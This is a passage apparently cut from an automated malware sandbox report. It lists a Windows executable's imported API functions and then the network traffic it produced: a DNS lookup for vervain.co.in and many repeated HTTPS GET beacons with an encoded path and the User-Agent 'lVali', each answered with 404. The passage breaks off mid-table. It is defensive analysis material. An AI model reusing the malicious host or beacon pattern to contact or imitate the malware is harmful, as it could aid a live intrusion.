DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                kernel32.dllSleep
                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                shell32.dllShellExecuteA
                comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                winmm.dllsndPlaySoundA
                kernel32VirtualProtect, GetProcAddress
                URLAddMIMEFileTypesPS
                Language of compilation system | Country where language is spoken
                English | United States
                German | Germany
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Aug 5, 2022 15:08:21.293731928 CEST | 62099 | 53 | 192.168.2.4 | 8.8.8.8
                Aug 5, 2022 15:08:21.449959040 CEST | 53 | 62099 | 8.8.8.8 | 192.168.2.4
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Aug 5, 2022 15:08:21.293731928 CEST | 192.168.2.4 | 8.8.8.8 | 0x95fa | Standard query (0) | vervain.co.in | A (IP address) | IN (0x0001)
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Aug 5, 2022 15:08:21.449959040 CEST | 8.8.8.8 | 192.168.2.4 | 0x95fa | No error (0) | vervain.co.in | | 199.79.62.221 | A (IP address) | IN (0x0001)
                • vervain.co.in
                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.4 | 49744 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:22 UTC | 0 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:22 UTC | 0 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:22 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.4 | 49752 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:23 UTC | 0 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:23 UTC | 1 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:23 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                10 | 192.168.2.4 | 49765 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:38 UTC | 9 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:38 UTC | 9 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:38 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                11 | 192.168.2.4 | 49766 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:39 UTC | 10 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:39 UTC | 10 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:39 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                12 | 192.168.2.4 | 49767 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:41 UTC | 11 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:41 UTC | 11 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:41 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                13 | 192.168.2.4 | 49768 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:42 UTC | 12 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:42 UTC | 12 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:42 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                14 | 192.168.2.4 | 49769 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:43 UTC | 13 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:43 UTC | 13 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:43 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                15 | 192.168.2.4 | 49770 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:45 UTC | 14 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:45 UTC | 14 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:45 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                16 | 192.168.2.4 | 49771 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:46 UTC | 15 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:46 UTC | 15 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:46 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                17 | 192.168.2.4 | 49772 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:47 UTC | 16 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:47 UTC | 16 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:47 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                18 | 192.168.2.4 | 49773 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:48 UTC | 17 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:49 UTC | 17 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:49 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                19 | 192.168.2.4 | 49774 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:50 UTC | 18 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:50 UTC | 18 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:50 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                2 | 192.168.2.4 | 49755 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:24 UTC | 1 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:24 UTC | 2 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:24 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                20 | 192.168.2.4 | 49775 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:51 UTC | 19 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:51 UTC | 19 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:51 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                21 | 192.168.2.4 | 49776 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:53 UTC | 20 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:53 UTC | 20 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:53 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                22 | 192.168.2.4 | 49777 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:58 UTC | 21 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:59 UTC | 21 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:59 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                23 | 192.168.2.4 | 49783 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:00 UTC | 22 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:01 UTC | 22 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:01 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                24 | 192.168.2.4 | 49789 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:01 UTC | 23 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:02 UTC | 23 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:02 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                25 | 192.168.2.4 | 49791 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:03 UTC | 24 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:03 UTC | 24 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:03 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                26 | 192.168.2.4 | 49794 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:04 UTC | 25 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:04 UTC | 25 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:04 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                27 | 192.168.2.4 | 49795 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:06 UTC | 26 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:06 UTC | 26 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:06 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                28 | 192.168.2.4 | 49796 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:08 UTC | 27 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:08 UTC | 27 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                29 | 192.168.2.4 | 49797 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:09 UTC | 27 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:10 UTC | 28 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:10 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                3 | 192.168.2.4 | 49758 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:25 UTC | 2 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:25 UTC | 3 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:25 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                30 | 192.168.2.4 | 49799 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:10 UTC | 28 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:11 UTC | 29 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:11 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                31 | 192.168.2.4 | 49800 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:11 UTC | 29 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:12 UTC | 30 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:12 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
